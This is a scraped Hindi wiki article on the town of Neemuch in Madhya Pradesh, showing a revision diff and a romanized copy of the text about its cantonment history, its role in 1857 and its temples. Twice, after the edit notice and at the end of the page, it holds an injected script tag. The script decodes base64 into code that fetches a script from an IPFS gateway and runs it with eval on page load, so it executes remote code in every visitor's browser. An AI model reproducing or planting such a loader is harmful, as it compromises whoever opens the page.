Difference between revisions of "नीमच"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
*यह नगर [[मध्य प्रदेश]] राज्य के मंदसौर ज़िले के पास 500 मीटर की ऊँचाई पर बंजर बैसाल्ट पर्वत चौटी पर स्थित है।  
+
[[चित्र:Nava-Torana-Temple.jpg|thumb|250px|नव तोरण मंदिर, नीमच]]
 +
'''नीमच''' [[मध्य प्रदेश]] राज्य के [[मंदसौर ज़िला|मंदसौर ज़िले]] के पास 500 मीटर की ऊँचाई पर बंजर बैसाल्ट पर्वत चौटी पर स्थित है।  
 
*[[ग्वालियर]] रियासत की पूर्व ब्रिटिश छावनी रहा यह नगर 1822 में संयुक्त राजपूताना-[[मालवा]] राजनीतिक एजेंसी का और 1895 में मालवा एजेंसी का मुख्यालय बना।
 
*[[ग्वालियर]] रियासत की पूर्व ब्रिटिश छावनी रहा यह नगर 1822 में संयुक्त राजपूताना-[[मालवा]] राजनीतिक एजेंसी का और 1895 में मालवा एजेंसी का मुख्यालय बना।
 
*नीमच के पास बारूखेड़ा है, जहाँ विशाल पत्थरों से निर्मित आकर्षक धर्मस्थल है।  
 
*नीमच के पास बारूखेड़ा है, जहाँ विशाल पत्थरों से निर्मित आकर्षक धर्मस्थल है।  
*नीमच के समीप ही प्राचीन बालसहर गाँव में कई [[जैन]] मन्दिर हैं।  
+
*नीमच के समीप ही प्राचीन बालसहर गाँव में कई जैन मन्दिर हैं।  
*यह नगर [[अजमेर]] सूबे की सरकार (ज़िला) का एक महल था।
+
*नीमच [[अजमेर]] सूबे की सरकार (ज़िला) का एक महल था।
 
*यह मूलतः [[उदयपुर]] राज्य का हिस्सा था और 1768 ई. में [[मेवाड़]] के राणा द्वारा लिए गए कर्ज़ की अदायगी के रूप में सिंधिया शासकों को दे दिया गया।  
 
*यह मूलतः [[उदयपुर]] राज्य का हिस्सा था और 1768 ई. में [[मेवाड़]] के राणा द्वारा लिए गए कर्ज़ की अदायगी के रूप में सिंधिया शासकों को दे दिया गया।  
 
*उसके बाद से यह ग्वालियर राज्य का हिस्सा रहा।  
 
*उसके बाद से यह ग्वालियर राज्य का हिस्सा रहा।  
 
*1799 ई. और 1844 ई. में कुछ समय के लिए यह इससे अलग रहा।
 
*1799 ई. और 1844 ई. में कुछ समय के लिए यह इससे अलग रहा।
 
*1857 के महान् विद्रोह में नीमच छावनी ने महत्त्वपूर्ण भूमिका निभाई थी और यह मालवा में उपद्रव का केन्द्र था।  
 
*1857 के महान् विद्रोह में नीमच छावनी ने महत्त्वपूर्ण भूमिका निभाई थी और यह मालवा में उपद्रव का केन्द्र था।  
*नीमच के दर्शनीय स्थलों में भादवा माता का मंदिर है, जिसमें [[शैलपुत्री]], [[ब्रह्मचारिणी]], [[चंद्रघंटा तृतीय|चंद्रघटा]], [[काली]], [[स्कन्दमाता]], और [[कात्यायनी]] माता की मूर्तियाँ भी स्थापित हैं।  
+
*नीमच के दर्शनीय स्थलों में [[भादवा माता मंदिर|भादवा माता का मंदिर]] है, जिसमें [[शैलपुत्री]], [[ब्रह्मचारिणी]], [[चंद्रघंटा तृतीय|चंद्रघटा]], [[काली]], [[स्कन्दमाता]], और [[कात्यायनी]] माता की मूर्तियाँ भी स्थापित हैं।  
 
*इस मंदिर में काले पत्थर से निर्मित [[विष्णु]] की प्रतिमा भी है।  
 
*इस मंदिर में काले पत्थर से निर्मित [[विष्णु]] की प्रतिमा भी है।  
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
  
{{मध्य प्रदेश के ऐतिहासिक स्थान}}
 
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__
 
[[Category:मध्य_प्रदेश]][[Category:मध्य_प्रदेश_के_ऐतिहासिक_स्थान]]
 
[[Category:मध्य_प्रदेश]][[Category:मध्य_प्रदेश_के_ऐतिहासिक_स्थान]]
 +
[[Category:ऐतिहासिक_स्थान_कोश]]

Latest revision as of 13:13, 24 October 2013

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|250px|nav toran mandir, nimach nimach madhy pradesh rajy ke mandasaur zile ke pas 500 mitar ki ooanchaee par banjar baisalt parvat chauti par sthit hai.

  • gvaliyar riyasat ki poorv british chhavani raha yah nagar 1822 mean sanyukt rajapootana-malava rajanitik ejeansi ka aur 1895 mean malava ejeansi ka mukhyalay bana.
  • nimach ke pas barookhe da hai, jahaan vishal pattharoan se nirmit akarshak dharmasthal hai.
  • nimach ke samip hi prachin balasahar gaanv mean kee jain mandir haian.
  • nimach ajamer soobe ki sarakar (zila) ka ek mahal tha.
  • yah moolatah udayapur rajy ka hissa tha aur 1768 ee. mean meva d ke rana dvara lie ge karz ki adayagi ke roop mean siandhiya shasakoan ko de diya gaya.
  • usake bad se yah gvaliyar rajy ka hissa raha.
  • 1799 ee. aur 1844 ee. mean kuchh samay ke lie yah isase alag raha.
  • 1857 ke mahanh vidroh mean nimach chhavani ne mahattvapoorn bhoomika nibhaee thi aur yah malava mean upadrav ka kendr tha.
  • nimach ke darshaniy sthaloan mean bhadava mata ka mandir hai, jisamean shailaputri, brahmacharini, chandraghata, kali, skandamata, aur katyayani mata ki moortiyaan bhi sthapit haian.
  • is mandir mean kale patthar se nirmit vishnu ki pratima bhi hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>